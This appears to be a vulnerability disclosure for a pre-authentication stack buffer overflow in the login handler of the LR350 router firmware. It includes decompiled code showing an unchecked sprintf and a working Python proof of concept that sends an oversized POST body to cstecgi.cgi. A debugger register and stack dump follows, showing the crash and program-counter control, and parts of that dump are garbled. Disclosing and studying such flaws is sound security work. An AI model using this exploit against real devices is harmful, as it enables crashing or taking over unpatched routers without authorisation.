## LR350 - bof - main (pre-authentication)

Hi, we found a **pre-authentication** stack buffer overflow at **LR350** (Firmware version **V9.3.5u.6369\_B20220309**), and contact you at the first time.

```
goto LABLE_13,
if ( strstr(v3, "action=login") )
{
    if ( strstr(v3, "flag=ie8") )
    {
        v33 = strstr(v3, "verify=error");
        v34 = (const char *)getenv("http_host");
        sprintf(
        v36,
        "{\"topicurl\":\"loginAuth\",\"loginAuthUrl\":\"%s&http_host=%s&flag=ie8&verify=%d\"}",
        v34,
        v34,
        v33 != 0);
        v12 = v36;
}
```

In main function, the length of post data is not checked. If the query string is specified as /cgi-bin/cstecgi.cgi?action=login&flag=ie8, one can send a very long post data to overflow the stack buffer via sprintf.

**PoC** 

```
import requests url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi?
action=login&flag=ie8" cookie = {"Cookie":"uid=1234"} data =
"username="+"a"*5000 response = requests.post(url, cookies=cookie, data=data)
print(response.text) print(response)
```

The PC register can be hijacked, which means it can result in RCE.

```
T5
      0x1
 T6
      0x400
               (main+1116) ← lw $gp, 0x20($sp) /* ' ' */
 T7
      0x39
 T8
 T9

← sltiu $v0, $a2, 0x10

      0x61616161 ('aaaa')
 S0
 S1
      <u>0x7fa39d2c</u> ← 0x61616161 ('aaaa')
 S2
 S3
      0x3d
 S4

← sltiu $v0, $a2, 0x10

      0x/70100770
0x431360 ← 'NEED_AUTH'
 S5
      0xb6a3<u>a0</u> ← 0x0
 S6
 S7
      0x77f23024
 S8
      0x77e548b4
 FP
      0x0
 SP
      <u>0x7fa38900</u> ← 0x0
 PC
                 ← lbu
                           $v0, ($a1)
 ► 0x77a18954
                 lbu
                        $v0, ($a1)
                addiu $a0, $a0, 1
  0x77a18958
                 subu $v1, $v1, $v0
   0x77a1895c
                       $v1, 0x77a18978
  0x77a18960
                bnez
  0x77a18964
               addiu $a1, $a1, 1
                addiu $a2, $a2, -1
  0x77a18968
  0x77a1896c
                bnel $a2, $zero, 0x77a18954
  0x77a18970
                lbu
                       $v1, ($a0)
  0x77a18974
                move $v0, $v1
   0x77a18978
   0x77a1897c
                jг
                        $га
00:0000 sp 0 \times 7 = 38900 \leftarrow 0 \times 0
01:0004
             <u>0x7fa38904</u> → <u>0x7fa38a70</u> ← 0x6f74227b ('{"to')
02:0008
             0x7fa38908 → 0x7fa3ae54 ← '192.168.17.208'
             0x7fa3890c → 0xb6a410 ← 'loginAuth'
03:000c
04:0010
             <u>0x7fa38910</u> → 0x7f93bd98 ← 0x7f93bd98
05:0014
             0x7fa38914 → 0xb69008 ← 0x72657375 ('user')
06:0018
             0x7fa38918 ← 0x77e548b4
                                       ← lw
                                                $gp, 0x20($sp) /* ' ' */
07:001c
             0x7fa3891c →
▶ f 0 77a18954
```